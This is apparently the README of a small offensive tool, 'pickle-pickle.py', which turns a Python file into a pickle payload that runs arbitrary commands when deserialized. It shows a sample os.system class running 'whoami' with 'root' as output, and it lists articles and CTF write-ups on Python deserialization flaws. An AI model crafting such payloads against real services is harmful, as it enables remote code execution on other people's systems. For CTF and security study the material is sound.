A arbitrary python code executer via python pickle
# cat evil.py
#!/usr/bin/env python
# encoding:utf-8
class Exploit():
def __init__(self, command):
self.command = command
def run(self):
import os
return os.system(self.command)
print(Exploit("whoami").run())
# python pickle-pickle.py
Usage:
python ./pickle-pickle.py [FILENAME]
# python pickle-pickle.py evil.py
root
- Only tested on Python 3.7.4
- Source Code
- Documents
- CTF WriteUP
- Articles
- https://checkoway.net/musings/pickle/
- https://www.leavesongs.com/PENETRATION/code-breaking-2018-python-sandbox.html
- https://www.leavesongs.com/PENETRATION/python-string-format-vulnerability.html
- https://www.leavesongs.com/PENETRATION/zhangyue-python-web-code-execute.html
- https://zhuanlan.zhihu.com/p/25981037
- http://www.bendawang.site/2018/04/18/Python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E8%8A%B1%E5%BC%8F%E5%88%A9%E7%94%A8/
- http://intx0x80.blogspot.com/2017/05/python-input-vulnerability_25.html
- Papers
- Tools